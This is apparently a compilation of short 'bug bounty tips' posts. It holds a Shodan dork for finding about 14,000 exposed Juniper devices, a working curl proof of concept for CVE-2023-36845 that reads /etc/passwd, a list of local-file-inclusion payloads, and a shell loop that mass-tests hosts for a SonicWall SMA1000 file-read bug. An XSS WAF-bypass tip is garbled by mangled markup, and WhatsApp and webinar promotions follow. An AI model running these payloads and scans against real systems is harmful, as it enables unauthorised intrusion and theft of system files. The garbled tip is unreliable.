Bug bounty Tips

Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845 Nearly 14,000 Juniper devices are affected, as a search on Shodan shows: Dork : title:"Juniper" http.favicon.hash:2141724739 Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'

POST /register HTTP/1.1 Host: host.com email=iamhunter@hackerone.com&password=userPassword #bugbountytips

Browser-Based Application Local File Inclusion file:///etc/passwd - view-source:file:///etc/passwd - file:/etc/passwd?/ - file:///etc/?/../passwd - file:${br}/et${u}c/pas${te}swd?/ - file:/etc/passwd?/ - file:/etc/passwd%3F/ - file:/etc%252Fpasswd/ - file:/etc%252Fpasswd%3F/ - file:///etc/%3F/../passwd - file:${br}/et${u}c/pas${te}swd?/ - file:$(br)/et$(u)c/pas$(te)swd?/ - file:${br}/et${u}c%252Fpas${te}swd?/ - file:$(br)/et$(u)c%252Fpas$(te)swd?/ - file:${br}/et${u}c%252Fpas${te}swd%3F/ - file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ - file:///etc/passwd?/../passwd - text:/etc/passwd #bugbountytips

Where finding flaws feels like searching for lost keys in the dark. 🔍🐛

Nobody was ever productive with 32 tabs open in their web.

Here is the Amazing Writeups Regards SQLi with deep understanding https://medium.com/@bug4y0u/how-i-got-4-sqli-vulnerabilities-at-one-target-manually-using-the-repeater-tab-ed4eb1f84147

CVE-2023-0126 SonicWall SMA1000 File Read Bug POC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done

Bug Bounty Reminder Don't forget about the $element\; for\; XSS\; WAF\; bypass\; on\; Firefox\; browser.$ Click\; Me$The$ can\; make\; any\; HTML\; element\; clickable\; within\; it.$$

🔥OSCP Training🔥🛡⚔️👨🏻‍💻: Mindmap/Nmap/nmap UHD.png at main · Ignitetechnologies/Mindmap · GitHub https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png Mindmap/Red Team Dorks at main · Ignitetechnologies/Mindmap · GitHub https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks Mindmap/Google Dorks at main · Ignitetechnologies/Mindmap · GitHub https://github.com/Ignitetechnologies/Mindmap/tree/main/Google%20Dorks

🔐 SSRF Vulnerability Series 🔐 Dive into the world of Server-Side Request Forgery (SSRF) and uncover its secrets in this comprehensive series: 1. Understanding SSRF Vulnerabilities and Their Impact 2. Exploring the Canvas: Common Exploits for Accessing Internal Pages 3. Revealing Hidden Treasures: Accessing Internal Files via URL Scheme 4. Connecting to Services via URL Schemes 5. Mastering SSRF Exploits: Unraveling Gophers' Web of Intrigue 6. XSPA: Navigating the Labyrinth of Port Scanning in SSRF 7. Unveiling the Secrets of Cloud Provider Metadata through SSRF 8. Unlocking Forbidden Territories: Mastering Blacklist Bypass Techniques Explore each chapter to enhance your SSRF knowledge! 🔍💡

Join the groupfor workshop we will provide u a joining link there. Would appreciate more if u want to. Attend this beautiful wisdom sharing thing. Follow this link to join my WhatsApp group: https://chat.whatsapp.com/IDNr59i9JbB3dYNW6R6GoK

VULNERABLE Kernel Drivers for Security Research https://www.youtube.com/watch?v=3kQXu6TVXWw

Webinar registration link https://tr.ee/MkcAUOduZI

check out this guys, links to all media and websites https://linktr.ee/cipherops01